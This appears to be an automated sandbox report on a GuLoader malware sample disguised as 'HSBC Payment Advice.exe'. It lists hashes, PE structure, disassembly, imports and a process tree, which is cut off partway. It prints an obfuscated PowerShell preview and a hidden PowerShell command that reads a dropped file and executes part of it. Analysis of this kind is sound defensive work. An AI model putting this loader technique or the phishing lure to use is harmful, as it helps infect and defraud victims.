        MD5:A493F57E18C597B0D7AB8C1ECBA32451
        SHA1:101A0DE3607767D8FC97DF39D97E449EF2694D7C
        SHA-256:56134D07525A53B1F8CD93C5E7D2FB09C0CA0A9B32C6FCAC55EECD7E53CBC123
        SHA-512:CE93394FCA0EA46D22C4095A9AD22533A1FDB198CA0A8E12B22A194843EE1A2409AAD03860B0F886E1ADC7AF6CF964B24E827120C28A7CED118FD719FE6C7D60
        Malicious:true
        Preview:$geste=$Sarum;..<#Vksthormon Begaud Salique #>..<#Skelsaars Monocled Vermilinguia Outspinned Fasciolet #>..<#Indekseres Pediculation Stemmetallet Papirindfring Skrupkedeligt #>..<#Egnsbank Byrd Spdbarnsplejes Necker Demonstratrer #>..<#Madopskrifternes Nordvestefter Bestykkende #>..<#angrier Ansgte Gastralgic Marlinspike Jyskes Saligprisning Unsoulfulness #>...$Hjhedens = @'. M rion.Spaceme$NeeldcaRAfkal,ne PythoncHfte seoInkslinnBoondoccSubtrakeBogfrinn FlerletViktualrHoarin,aEvakuert gifteri Fabriko Afri.nnDisdenolStramtegSalaamsa I,rtsatLitigateSrinterr VrisseoTaphu skguldsmeePerionyr Neur s2Outwind4Unfaili7 Appelm= V dium$ScarphsRfl,mredeWithh lcTekstmooNonutilnCirkussc etaltre uccedanuncondetPrinterr Suspena tredivtSlar umiPaed atoSupermonOvalityl an estg E uidia hesusnt GabrieeDisfriaeNonexi.r essertbTstrykkeChevrolrBa longtIso.olipNonlamipBrach,peUnmasterRedominn MonoteeA,affscsBeaverb;teoreti.AcutelyfJollyinuRegelrenSelvbetcenantiotUd knkniFagbgeroVitam rnKakaoen Tou,htSUnhand
        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
        Entropy (8bit):7.6591953374855795
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:HSBC Payment Advice.exe
        File size:879'498 bytes
        MD5:b9138cef86a6c7324bec281bb7fa3e00
        SHA1:0d8d3ec170c54904dd6c7f87e6f8418810f8ecfb
        SHA256:b3eedff35f3202a6614d84582160de6b56c0bcd26f698c34b17d03c20d923c17
        SHA512:5e1100154757c3bd774c7206a3018d5b3a4ff18b79cdacd483b37e9bd2645927e1fd395851c49c4dfb6a8fcc2a557a2155af0cc98e3c1305b654dc68816d2e56
        SSDEEP:12288:UtQAVPMVLmfK04s8N74PsscOtJvLr8cciBja/WSQ9LJlf3NkcF3gIVlMh+NwQu9:1AmVuKQV/rpjaO1lf3oIvMh+NwQ6
        TLSH:FD15F18B6C52C89AE0D07F716CF5A19729377CA51234C1DFE9C7BE2C6EB225067C1298
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................`...*......X3.......p....@
        Icon Hash:8b82989999951d11
        Entrypoint:0x403358
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        DLL Characteristics:TERMINAL_SERVER_AWARE
        Time Stamp:0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:4
        OS Version Minor:0
        File Version Major:4
        File Version Minor:0
        Subsystem Version Major:4
        Subsystem Version Minor:0
        Import Hash:e221f4f7d36469d53810a4b5f9fc8966
        Instruction
        sub esp, 000002D4h
        push ebx
        push ebp
        push esi
        push edi
        push 00000020h
        xor ebp, ebp
        pop esi
        mov dword ptr [esp+14h], ebp
        mov dword ptr [esp+10h], 00409230h
        mov dword ptr [esp+1Ch], ebp
        call dword ptr [00407034h]
        push 00008001h
        call dword ptr [004070BCh]
        push ebp
        call dword ptr [004072ACh]
        push 00000008h
        mov dword ptr [00429298h], eax
        call 00007FAC04E823CCh
        mov dword ptr [004291E4h], eax
        push ebp
        lea eax, dword ptr [esp+34h]
        push 000002B4h
        push eax
        push ebp
        push 00420690h
        call dword ptr [0040717Ch]
        push 0040937Ch
        push 004281E0h
        call 00007FAC04E82037h
        call dword ptr [00407134h]
        mov ebx, 00434000h
        push eax
        push ebx
        call 00007FAC04E82025h
        push ebp
        call dword ptr [0040710Ch]
        cmp word ptr [00434000h], 0022h
        mov dword ptr [004291E0h], eax
        mov eax, ebx
        jne 00007FAC04E7F51Ah
        push 00000022h
        mov eax, 00434002h
        pop esi
        push esi
        push eax
        call 00007FAC04E81A76h
        push eax
        call dword ptr [00407240h]
        mov dword ptr [esp+18h], eax
        jmp 00007FAC04E7F5DEh
        push 00000020h
        pop edx
        cmp cx, dx
        jne 00007FAC04E7F519h
        inc eax
        inc eax
        cmp word ptr [eax], dx
        je 00007FAC04E7F50Bh
        add word ptr [eax], 0000h
        Programming Language:
        • [EXP] VC++ 6.0 SP5 build 8804
        Name | Virtual Address | Virtual Size | Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata
        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x48000 | 0x2d9f0 | .rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
        .text | 0x1000 | 0x5e66 | 0x6000 | e8f12472e91b02deb619070e6ee7f1f4 | False | 0.6566569010416666 | data | 6.419409887460116 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .rdata | 0x7000 | 0x1354 | 0x1400 | 2222fe44ebbadbc32af32dfc9c88e48e | False | 0.4306640625 | data | 5.037511188789184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .data | 0x9000 | 0x202d8 | 0x600 | a5ec1b720d350c6303a7aba8d85072bf | False | 0.4733072916666667 | data | 3.7600484096214832 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .ndata | 0x2a000 | 0x1e000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rsrc | 0x48000 | 0x2d9f0 | 0x2da00 | 7af8bc69303ad1632e4b4b11332b9a00 | False | 0.2853863441780822 | data | 5.311136424558202 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
        RT_ICON | 0x48388 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.13396131550928664
        RT_ICON | 0x58bb0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.18375551818372923
        RT_ICON | 0x62058 | 0x5519 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9949506541198072
        RT_ICON | 0x67578 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.21658964879852124
        RT_ICON | 0x6ca00 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.21268304204062352
        RT_ICON | 0x70c28 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.2842323651452282
        RT_ICON | 0x731d0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.35154784240150094
        RT_ICON | 0x74278 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.45819672131147543
        RT_ICON | 0x74c00 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5576241134751773
        RT_DIALOG | 0x75068 | 0x100 | data | English | United States | 0.5234375
        RT_DIALOG | 0x75168 | 0x11c | data | English | United States | 0.6056338028169014
        RT_DIALOG | 0x75288 | 0xc4 | data | English | United States | 0.5918367346938775
        RT_DIALOG | 0x75350 | 0x60 | data | English | United States | 0.7291666666666666
        RT_GROUP_ICON | 0x753b0 | 0x84 | data | English | United States | 0.7272727272727273
        RT_VERSION | 0x75438 | 0x2b0 | data | English | United States | 0.5101744186046512
        RT_MANIFEST | 0x756e8 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984
        DLL | Import
        KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
        USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
        GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
        SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
        ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
        COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
        ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
        VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
        Language of compilation system | Country where language is spoken | Map
        English | United States |
        No network behavior found

        Target ID:0
        Start time:05:16:38
        Start date:14/10/2024
        Path:C:\Users\user\Desktop\HSBC Payment Advice.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\Desktop\HSBC Payment Advice.exe"
        Imagebase:0x400000
        File size:879'498 bytes
        MD5 hash:B9138CEF86A6C7324BEC281BB7FA3E00
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true

        Target ID:2
        Start time:05:16:39
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):true
        Commandline:"powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj';$nijholt=$Finurligheden.SubString(56673,3);.$nijholt($Finurligheden) "
        Imagebase:0x6c0000
        File size:433'152 bytes
        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.91928114130.0000000008F22000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
        Reputation:high
        Has exited:false

        Target ID:3
        Start time:05:16:39
        Start date:14/10/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff6afa90000
        File size:875'008 bytes
        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:4
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:5
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:6
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true

        Target ID:7
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:8
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:9
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:10
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:11
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:12
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:13
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:14
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:15
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:16
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:17
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:18
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:19
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:20
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:21
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:22
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:23
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:24
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:25
        Start time:05:16:55
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:26
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:27
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:28
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:29
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:30
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:31
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:32
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:33
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:34
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\msiexec.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
        Imagebase:0x1000000
        File size:59'904 bytes
        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:35
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:36
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:37
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:38
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:39
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:40
        Start time:05:16:56
